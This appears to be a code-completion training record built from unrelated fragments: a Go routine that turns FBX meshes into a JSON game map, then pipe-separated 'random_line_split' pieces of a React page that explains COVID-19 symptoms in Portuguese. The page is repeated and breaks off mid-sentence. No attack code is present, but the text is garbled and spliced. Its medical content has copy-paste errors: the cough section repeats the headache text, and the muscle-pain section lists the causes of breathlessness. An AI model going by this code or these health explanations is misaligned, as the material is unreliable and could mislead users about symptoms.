Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, model := range modelsGround {
//fmt.Println("# " + model.name)
grounds = append(grounds, mapcontainer.MapGround{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, start := range modelsStart {
origin := vertexType{0, 0, 0}.applyTransform(start.getFullTransform())
starts = append(starts, mapcontainer.MapStart{
Id: strconv.Itoa(int(start.id)),
Name: start.name,
Point: mapcontainer.MapPoint{
origin[0],
origin[1],
},
})
}
builtmap := mapcontainer.MapContainer{}
builtmap.Meta.Readme = "Byte Arena Map"
builtmap.Meta.Kind = "deathmatch"
builtmap.Meta.MaxContestants = len(starts)
builtmap.Meta.Date = time.Now().Format(time.RFC3339)
builtmap.Data.Grounds = grounds
builtmap.Data.Starts = starts
builtmap.Data.Obstacles = obstacles
bjsonmap, _ := json.MarshalIndent(builtmap, "", " ")
fmt.Println(string(bjsonmap))
}
func debugPolygonSVG(polygon []vector.Vector2) {
fmt.Println("<svg height='700' width='500'><g transform='translate(700,350) scale(4)'>")
for i := 0; i < len(polygon); i++ {
nextIndex := 0
if i == len(polygon)-1 {
nextIndex = 0
} else {
nextIndex = i + 1
}
a := polygon[i]
b := polygon[nextIndex]
fmt.Println(fmt.Sprintf("<line title='Edge #%d' x1=\"%f\" y1=\"%f\" x2=\"%f\" y2=\"%f\" style=\"stroke: black; stroke-width: 0.1;\" />", i+1, a.GetX()*10, a.GetY()*10, b.GetX()*10, b.GetY()*10))
}
fmt.Println("</g></svg>")
}
type vertexType [3]float64
type edgeType [2]vertexType
type faceType []vertexType
func (a vertexType) Equals(b vertexType) bool {
return number.FloatEquals(a[0], b[0]) && number.FloatEquals(a[1], b[1]) && number.FloatEquals(a[2], b[2])
}
func (p vertexType) String() string {
return fmt.Sprintf("<vertex(%f, %f, %f)>", p[0], p[1], p[2])
}
func (p vertexType) applyTransform(transform mgl64.Mat4) vertexType {
res := mgl64.TransformCoordinate(
mgl64.Vec3{
p[0],
p[1],
p[2],
},
transform,
)
return vertexType{
res.X(),
res.Y(),
res.Z(),
}
}
func (a edgeType) Equals(b edgeType) bool {
return a[0].Equals(b[0]) && a[1].Equals(b[1]) || a[1].Equals(b[0]) && a[0].Equals(b[1])
}
func (face faceType) GetEdges() []edgeType {
edges := make([]edgeType, 0)
for i := 0; i < len(face); i++ {
nextIndex := i + 1
if i == len(face)-1 {
nextIndex = 0
}
edges = append(edges, edgeType{face[i], face[nextIndex]})
}
return edges
}
func (poly faceType) applyTransform(transform mgl64.Mat4) faceType {
res := make(faceType, len(poly))
for i, p := range poly {
res[i] = p.applyTransform(transform)
}
return res
}
type fbxScene struct {
upAxis int
upAxisSign int
frontAxis int
frontAxisSign int
coordsAxis int
coordsAxisSign int
}
type fbxTransform struct {
translation vertexType
rotation vertexType
scaling vertexType
}
type fbxModel struct {
parent *fbxModel
children []*fbxModel
id int64
name string
transform fbxTransform
geometry *fbxGeometry
}
func (model *fbxModel) getFullTransform() mgl64.Mat4 {
// ordre : local -> global
mats := make([]mgl64.Mat4, 0)
mats = append(mats, mgl64.Scale3D(0.01, 0.01, 0.01))
current := model
for current != nil {
var scale mgl64.Mat4
if current.transform.scaling[0] == 0.0 && current.transform.scaling[1] == 0.0 && current.transform.scaling[2] == 0.0 {
scale = mgl64.Scale3D(1, 1, 1)
} else {
scale = mgl64.Scale3D(current.transform.scaling[0], current.transform.scaling[1], current.transform.scaling[2])
}
rotx := mgl64.HomogRotate3DX(mgl64.DegToRad(current.transform.rotation[0]))
roty := mgl64.HomogRotate3DY(mgl64.DegToRad(current.transform.rotation[1]))
rotz := mgl64.HomogRotate3DZ(mgl64.DegToRad(current.transform.rotation[2]))
trans := mgl64.Translate3D(current.transform.translation[0]/100.0, current.transform.translation[1]/100.0, current.transform.translation[2]/100.0)
mat := mgl64.Ident4().
Mul4(trans).
Mul4(rotz).
Mul4(roty).
Mul4(rotx).
Mul4(scale)
mats = append(mats, mat)
current = current.parent
}
mat := mgl64.Ident4()
for i := len(mats) - 1; i >= 0; i-- {
mat = mat.Mul4(mats[i])
}
return mat
}
type fbxGeometry struct {
id int64
name string
vertices []float64
indices []int
faces []faceType
}
func (g *fbxGeometry) getTransformedFaces(transform mgl64.Mat4) []faceType {
res := make([]faceType, len(g.faces))
for i, face := range g.faces {
res[i] = face.applyTransform(transform)
}
return res
}
type marshChild struct {
Name string `json:"name"`
Children json.RawMessage `json:"children"`
Properties []marshProperty `json:"properties"`
}
type marshProperty struct {
Type string `json:"type"`
Value json.RawMessage `json:"value"`
}
///////////////////////////////////////////////////////////////////////////////
func makeSortedEdge(a, b vertexType) edgeType {
var min, max = a, b
if min[0] > max[0] {
max, min = min, max
} else if min[0] == max[0] && min[1] > max[1] {
max, min = min, max
} else if min[0] == max[0] && min[1] == max[1] && min[2] > max[2] {
max, min = min, max
}
return edgeType{
min,
max,
}
}
func polygonFrom2DMesh(faces []faceType) mapcontainer.MapPolygon {
edges := make([]edgeType, 0)
polygon := make([]vector.Vector2, 0)
for _, face := range faces {
edges = append(edges, face.GetEdges()...)
}
// sort edges
sortedEdges := make([]edgeType, len(edges))
for i, edge := range edges {
sortedEdges[i] = makeSortedEdge(edge[0], edge[1])
}
type edgecount struct {
count int
edge edgeType
}
countedEdges := make(map[string]*edgecount)
for _, edge := range sortedEdges {
hash := getKeyForEdge(edge)
//fmt.Println("HASH", hash)
_, ok := countedEdges[hash]
if !ok {
countedEdges[hash] = &edgecount{
count: 1,
edge: edge,
}
} else {
countedEdges[hash].count++
}
}
//spew.Dump(points)
//spew.Dump(countedEdges)
outlineEdges := make([]edgeType, 0)
// stabilizing map iteration (easier for debug)
var countedEdgesKeys []string
for k := range countedEdges {
countedEdgesKeys = append(countedEdgesKeys, k)
}
sort.Strings(countedEdgesKeys)
for _, countedEdgeKey := range countedEdgesKeys {
countedEdge := countedEdges[countedEdgeKey]
if countedEdge.count == 1 {
outlineEdges = append(outlineEdges, countedEdge.edge)
}
}
if len(outlineEdges) == 0 {
return mapcontainer.MapPolygon{}
}
/////////////////////////////////////////////////////////////
// putting edges in the right order for the polygon
/////////////////////////////////////////////////////////////
outline := make([]edgeType, 0)
// taking the leftmost point as a starting point
var leftMostEdge *edgeType
for _, edge := range outlineEdges {
if leftMostEdge == nil || leftMostEdge[0][0] > edge[0][0] {
leftMostEdge = &edge
}
}
outline = append(outline, *leftMostEdge)
done := false
for i := 1; i < len(outlineEdges); i++ {
head := outline[i-1]
found := false
for _, edge := range outlineEdges {
if head.Equals(edge) {
continue
}
if head[1].Equals(edge[0]) {
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
} else if head[1].Equals(edge[1]) {
// swap edge points
edge[0], edge[1] = edge[1], edge[0]
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
}
}
if !found {
fmt.Println("Next edge not found in outlinesFrom2DMesh for", head, outlineEdges)
//os.Exit(1)
break
}
if done {
break
}
}
// /////////////////////////////////////////////////////////////
// /////////////////////////////////////////////////////////////
// // convert edges to points (vector2)
for _, edge := range outline {
polygon = append(polygon, vector.MakeVector2(edge[0][0], edge[0][1]))
}
// // ensure winding
polygon, err := polygonutils.EnsureWinding(polygonutils.CartesianSystemWinding.CCW, polygon)
if err != nil {
fmt.Println(err)
return mapcontainer.MapPolygon{}
}
points := make([]mapcontainer.MapPoint, 0)
for _, vec2 := range polygon {
points = append(points, mapcontainer.MapPoint{vec2.GetX(), vec2.GetY()})
}
return mapcontainer.MapPolygon{Points: points}
}
func getKeyForEdge(edge edgeType) string {
return fmt.Sprintf("%.5f_%.5f_%.5f_%.5f", edge[0][0], edge[0][1], edge[1][0], edge[1][1])
}
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
type ModelNameCollection []string
func (c ModelNameCollection) Contains(search string) int {
for i, group := range c {
if strings.Contains(group, search) {
return i
}
}
return -1
}
func getNodeNames(i *fbxModel) ModelNameCollection {
var model *fbxModel = i
res := make(ModelNameCollection, 0)
for model != nil {
if model.name != "" {
res = append(res, model.name)
}
model = model.parent
}
return res
}
type ModelNameFunction struct {
Function string
Args json.RawMessage
Original string
}
func (c ModelNameCollection) GetFunctions() []ModelNameFunction {
funcs := make([]ModelNameFunction, 0)
r := regexp.MustCompile("^ba:([a-zA-Z]+)\\((.*?)\\)$")
for _, group := range c {
parts := strings.Split(group, "-")
for _, part := range parts {
if r.MatchString(part) {
matches := r.FindStringSubmatch(part)
funcs = append(funcs, ModelNameFunction{
Function: matches[1],
Args: json.RawMessage("[" + matches[2] + "]"),
Original: part,
})
}
}
}
return funcs
} | if child3.Name == "PolygonVertexIndex" {
json.Unmarshal(child3.Properties[0].Value, &geometry.indices) | random_line_split |
symptoms.js | import React from "react";
import { Container, Col, Row, Image, Modal, Button } from "react-bootstrap";
import ImgSymptoms from "../assets/sick.png";
import ImgSymptomsCircle from "../assets/Circle.svg";
import "../components/symptoms.scss";
import Nurse from "../assets/nurse.svg";
const Symptoms = () => (
<Container>
<Col className="py-5">
<Col className="text-right m-5">
<h2 className="m-5">Sintomas do COVID-19</h2>
</Col>
<Row className="d-flex align-items-center">
<Col className="text-left" lg={3}>
<section classsName="icons__symptons ">
<AppCe />
</section>
<section classsName="icons__symptons ">
<AppTo />
</section>
<section classsName="icons__symptons ">
<AppFe />
</section>
</Col>
<Col
className="img__symptoms d-flex align-items-center justify-content-center "
lg={6}
>
<Image src={ImgSymptomsCircle} className="img__circle" />
<Image src={ImgSymptoms} />
</Col>
<Col className="text-right" lg={3}>
<section classsName="icons__symptons">
<AppDi />
</section>
<section classsName="icons__symptons">
<AppMu />
</section>
<section classsName="icons__symptons">
<AppPe />
</section>
</Col>
</Row>
</Col>
</Container>
);
//primeiro item
const One = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark">O que é Cefaleia tensional?</h4>
<p className="text-dark">
A cefaleia tensional é geralmente uma dor difusa, de leve a moderada
intensidade na sua cabeça, muitas vezes descrita como a sensação de uma
faixa apertando o crânio. A cefaleia tensional é o tipo mais comum de
dor de cabeça, e suas causas não são bem compreendidas. De acordo com a
Sociedade Brasileira de Cefaleia, cerca de 38% a 74% dos brasileiros
sofrem com cefaleia tensional.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark">Causas</h6>
<p className="text-dark">
{" "}
Não há uma causa única para dor de cabeça tensional. Este tipo de dor de
cabeça não é uma característica hereditária que ocorre em famílias. Em
algumas pessoas, dores de cabeça de tensão são causados pela contração
involuntária e crônica de músculos na parte de trás do pescoço e do
couro cabeludo. Essa tensão muscular pode ser causada por:
<ul>
<li> Repouso insuficiente </li>
<li> Má postura </li>
<li> Estresse emocional ou mental, incluindo</li>
<li> depressão </li>
<li> Ansiedade </li>
<li> Cansaço </li>
<li> Fome </li>
<li> Excesso de exercícios. </li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppCe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Cefalea
</button>
<One show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//segundo item de opção
const Tow = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Tosse?</h4>
<p className="text-dark">
Há dois tipos de tosse: a seca e a produtiva. É a presença ou não de
muco que estabelece a diferença. Na tosse produtiva a secreção se
movimenta e é eliminada; na seca, esse catarro parece não existir. É
importante avaliar se a tosse é realmente seca, ou se a secreção não
flui por desidratação ou tratamento incorreto.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas da Tosse</h6>
<p className="text-dark">
O fumo é a principal causa, porque aumenta o volume de muco produzido
pelos brônquios; causa irritação física e química das mucosas; destrói
os cílios que cobrem o revestimento interno dos brônquios; facilita o
acúmulo de material estranho às vias aéreas. Outras causas importantes
são a sinusite, principalmente em crianças, a síndrome do gotejamento
pós-nasal, a asma, o refluxo gastroesofágico, infecções respiratórias,
bronquite crônica e medicamentos para controle da hipertensão.
<h6 className="my-4">RECOMENDAÇÕES EM CASO DE TOSSE</h6>
<ul>
<li>
{" "}
Beba bastante água. A água é o melhor antitussígeno que se conhece,
pois facilita a movimentação do muco sobre a camada de cílios;{" "}
</li>
<li>
{" "}
Dê preferência aos líquidos quentes, que costumam trazer alívio
sintomático, como os chás de nossas avós: chá com limão e mel, de
camomila, erva cidreira, erva doce, entre outros. Chá-preto e
chá-mate devem ser evitados por causa do alto teor de cafeína;{" "}
</li>
<li>
{" "}
Mantenha a cabeça elevada à noite, usando travesseiros extras ou
levantando a cabeceira da cama com calços;
</li>
<li> Mantenha os ambientes bem ventilados;</li>
<li>
{" "}
Aumente o teor de umidade do ar com umidificadores ou vaporizadores.
Tome banhos quentes prolongados para respirar bastante vapor;
</li>
<li>
{" "}
Não tome remédios por conta própria. Procure assistência médica para
diagnóstico e tratamento.
</li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppTo() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Tosse
</button>
<Tow show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//terceiro
const Three = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Febre?</h4>
<p className="text-dark">
A febre é um dos sinais clínicos mais comuns no ser humano e se
caracteriza por uma elevação acima da média da temperatura corporal. A
febre é tão comum que a maioria de nós nunca parou para pensar no seu
real significado. PUBLICIDADE Geralmente associada à infecção, a febre
também pode ocorrer em diversas outras situações, como em caso de
tumores, doenças autoimunes, reação a medicamentos, etc. O corpo humano
apresenta uma temperatura normal entre 36 e 37,5ºC. Ela sofre alterações
ao longo do dia, estando mais próxima de 36ºC durante a madrugada e mais
para 37,5ºC no final da tarde. Esta variação é chamada de ciclo
circadiano da temperatura corporal. Uma temperatura de 37,5ºC no início
da manhã tem muito mais relevância do que esta mesma temperatura no
final do dia. Algumas pessoas têm naturalmente temperaturas um pouco
mais elevadas que outras, podendo apresentar algo em torno de 37,5ºC ao
final do dia sem que isso tenha qualquer significado clínico. Por outro
lado, há aqueles que possuem temperatura basal mais baixa, às vezes
próximo de 35,5ºC. Nestes, uma temperatura de 37,5ºC é algo bem acima do
seu normal. Portanto, antes de se diagnosticar uma febre, é importante
saber qual a temperatura habitual do paciente. Consideramos febre a
elevação da temperatura corporal acima da média do paciente. Como muitas
vezes não temos um histórico da variação habitual da temperatura de cada
indivíduo, usamos os valores médios encontrados em estudos para definir
os limites de temperatura que indicam febre. É importante termos em
mente também que o modo como medirmos a temperatura corporal pode
fornecer resultados diferentes. Quanto mais próximo do centro do corpo,
maior será a temperatura.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">
Quais são as principais causas de febre?
</h6>
<p className="text-dark">
As causas mais comuns de febre são as infecções. Doenças como pneumonia,
meningite, pielonefrite e endocardite (infecção das válvulas do coração)
costumam vir acompanhadas de febre alta e debilidade física. Gripe, ao
contrário do resfriado, também pode ser causa de febre alta (leia:
Diferenças entre gripe e resfriado). Quadros de febre prolongada,
normalmente por volta dos 38ºC, às vezes intermitentes ou somente
noturna, associada à perda de peso, em geral indicam infecções como
tuberculose ou AIDS. Câncer, leucemia e linfoma podem causar febre baixa
ou febrículas prolongadas. Doenças autoimunes, como lúpus, artrite
reumatoide também causam febre. Vários medicamentos podem causar febre,
incluindo antibióticos e anti-inflamatórios, por mais paradoxal que isso
possa parecer. Normalmente são reações individuais aos componentes da
droga, em um processo semelhante a uma alergia. Algumas causas menos
comuns de febre incluem:
<ul>
<li>Hipertireoidismo.</li>
<li>Excesso de exposição solar.</li>
<li>Cirurgias.</li>
<li> Traumas.</li>
<li>Feocromocitoma.</li>
<li>Embolia pulmonar.</li>
<li>Desidratação.</li>
<li>AVC (com lesão do hipotálamo).</li>
<li>Hepatite por álcool.</li>
</ul>
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppFe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Febre
</button>
<Three show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quarta
const Four = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Dispneia?</h4>
<p className="text-dark">
Dispneia é a sensação de falta de ar, dificuldade de respirar ou
respiração incompleta. Geralmente essa sensação é originada por doenças
cardíacas e/ou pulmonares, mas pode ser causada por diversas outras
condições. A dispneia pode ser classificada em aguda, crônica, dispneia
de esforço, de repouso e suspirosa.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas de dispneia</h6>
<ul className="text-dark">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li> | hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppDi() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dispneia
</button>
<Four show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quinta
const Five = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor muscular?</h4>
<p className="">
A dor muscular (CID 10 M79. 1) é comum e pode envolver mais de um
músculo. Ela pode, também, envolver ligamentos, tendões e fáscias, os
tecidos moles que conectam os músculos e ossos. Pode acontecer em muitas
partes do corpo como perna, coxa, ombro, costas, pescoço, entre outros.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
A dor muscular está mais frequentemente relacionada a tensão, uso
excessivo ou lesão muscular por exercício ou trabalho fisicamente
desgastante. Nessas situações, a dor tende a envolver músculos
específicos e começa durante ou logo após a atividade. Em geral a
atividade que está causando a dor muscular é óbvia. Porém, muitas vezes
o exercício ou postura que a desencadeiam é difícil de ser de ser
reconhecido. A dor muscular também pode ser um sinal de condições que
afetam todo seu corpo, como algumas infecções (incluindo a gripe). Uma
causa comum que muitas vezes é confundida com dor muscular é a
fibromialgia, uma condição que modifica o sistema que reconhece a dor
causando dores muitas vezes generalizadas, distúrbio do sono, fadiga e
dor de cabeça. Mas inúmeras causas podem levar à dor muscular. Veja
algumas:
</p>
<ul className="">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppMu() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor Muscular
</button>
<Five show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//sexta
const Six = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor no Peito?</h4>
<p className="">
Dor no peito (CID 10 - R07) é o desconforto ou dor que uma pessoa sente
na parte frontal do corpo, geralmente abaixo do pescoço e acima do
abdômen superior. Nem sempre é sintoma de infarto, podendo ser sintoma
de outras doenças e condições. Além disso, pode vir acompanhado de falta
de ar, tontura, entre outros. A dor no peito pode atingir diferentes
intensidades e migrar para outras partes do corpo, como as costas, o
pescoço e ambos os braços. Os sintomas da dor no peito variam de acordo
com a causa da dor. Majoritariamente, a dor no peito é relacionada a
algum problema no coração. Nesses casos, os sintomas mais comuns são:
</p>
<ul>
<li>Sensação de aperto no coração</li>
<li>
Dor que se espalha pelo corpo, em regiões como costas, pescoço, nuca,
ombros e braços (especialmente o esquerdo)
</li>
<li>
Dor recorrente, que dura por alguns minutos, desaparece e retorna,
variando sempre de intensidade
</li>
<li>Pode vir junto com falta de ar, tontura, náusea e sudorese.</li>
</ul>
<h6>Alguns sintomas sugerem ser não cardíacos, como:</h6>
<ul>
<li>Gosto amargo na boca</li>
<li>Dificuldade de deglutição</li>
<li>Dor que varia de intensidade conforme você muda de posição</li>
<li>Dor que se agrava quando você respira fundo ou tosse</li>
<li>Sensibilidade na região do peito.</li>
</ul>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
Existem diversas causas possíveis para a dor no peito. Ela também pode
estar diretamente relacionada a alguns órgãos.
</p>
<p>Causas ligadas ao coração:</p>
<ul className="">
<li>Infarto </li>
<li>Angina</li>
<li>Dissecção aórtica</li>
<li>Pericardite.</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppPe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor no Peito
</button>
<Six show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
export default Symptoms; | <li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças | random_line_split |
symptoms.js | import React from "react";
import { Container, Col, Row, Image, Modal, Button } from "react-bootstrap";
import ImgSymptoms from "../assets/sick.png";
import ImgSymptomsCircle from "../assets/Circle.svg";
import "../components/symptoms.scss";
import Nurse from "../assets/nurse.svg";
const Symptoms = () => (
<Container>
<Col className="py-5">
<Col className="text-right m-5">
<h2 className="m-5">Sintomas do COVID-19</h2>
</Col>
<Row className="d-flex align-items-center">
<Col className="text-left" lg={3}>
<section classsName="icons__symptons ">
<AppCe />
</section>
<section classsName="icons__symptons ">
<AppTo />
</section>
<section classsName="icons__symptons ">
<AppFe />
</section>
</Col>
<Col
className="img__symptoms d-flex align-items-center justify-content-center "
lg={6}
>
<Image src={ImgSymptomsCircle} className="img__circle" />
<Image src={ImgSymptoms} />
</Col>
<Col className="text-right" lg={3}>
<section classsName="icons__symptons">
<AppDi />
</section>
<section classsName="icons__symptons">
<AppMu />
</section>
<section classsName="icons__symptons">
<AppPe />
</section>
</Col>
</Row>
</Col>
</Container>
);
//primeiro item
const One = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark">O que é Cefaleia tensional?</h4>
<p className="text-dark">
A cefaleia tensional é geralmente uma dor difusa, de leve a moderada
intensidade na sua cabeça, muitas vezes descrita como a sensação de uma
faixa apertando o crânio. A cefaleia tensional é o tipo mais comum de
dor de cabeça, e suas causas não são bem compreendidas. De acordo com a
Sociedade Brasileira de Cefaleia, cerca de 38% a 74% dos brasileiros
sofrem com cefaleia tensional.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark">Causas</h6>
<p className="text-dark">
{" "}
Não há uma causa única para dor de cabeça tensional. Este tipo de dor de
cabeça não é uma característica hereditária que ocorre em famílias. Em
algumas pessoas, dores de cabeça de tensão são causados pela contração
involuntária e crônica de músculos na parte de trás do pescoço e do
couro cabeludo. Essa tensão muscular pode ser causada por:
<ul>
<li> Repouso insuficiente </li>
<li> Má postura </li>
<li> Estresse emocional ou mental, incluindo</li>
<li> depressão </li>
<li> Ansiedade </li>
<li> Cansaço </li>
<li> Fome </li>
<li> Excesso de exercícios. </li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppCe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Cefalea
</button>
<One show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//segundo item de opção
const Tow = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Tosse?</h4>
<p className="text-dark">
Há dois tipos de tosse: a seca e a produtiva. É a presença ou não de
muco que estabelece a diferença. Na tosse produtiva a secreção se
movimenta e é eliminada; na seca, esse catarro parece não existir. É
importante avaliar se a tosse é realmente seca, ou se a secreção não
flui por desidratação ou tratamento incorreto.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas da Tosse</h6>
<p className="text-dark">
O fumo é a principal causa, porque aumenta o volume de muco produzido
pelos brônquios; causa irritação física e química das mucosas; destrói
os cílios que cobrem o revestimento interno dos brônquios; facilita o
acúmulo de material estranho às vias aéreas. Outras causas importantes
são a sinusite, principalmente em crianças, a síndrome do gotejamento
pós-nasal, a asma, o refluxo gastroesofágico, infecções respiratórias,
bronquite crônica e medicamentos para controle da hipertensão.
<h6 className="my-4">RECOMENDAÇÕES EM CASO DE TOSSE</h6>
<ul>
<li>
{" "}
Beba bastante água. A água é o melhor antitussígeno que se conhece,
pois facilita a movimentação do muco sobre a camada de cílios;{" "}
</li>
<li>
{" "}
Dê preferência aos líquidos quentes, que costumam trazer alívio
sintomático, como os chás de nossas avós: chá com limão e mel, de
camomila, erva cidreira, erva doce, entre outros. Chá-preto e
chá-mate devem ser evitados por causa do alto teor de cafeína;{" "}
</li>
<li>
{" "}
Mantenha a cabeça elevada à noite, usando travesseiros extras ou
levantando a cabeceira da cama com calços;
</li>
<li> Mantenha os ambientes bem ventilados;</li>
<li>
{" "}
Aumente o teor de umidade do ar com umidificadores ou vaporizadores.
Tome banhos quentes prolongados para respirar bastante vapor;
</li>
<li>
{" "}
Não tome remédios por conta própria. Procure assistência médica para
diagnóstico e tratamento.
</li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
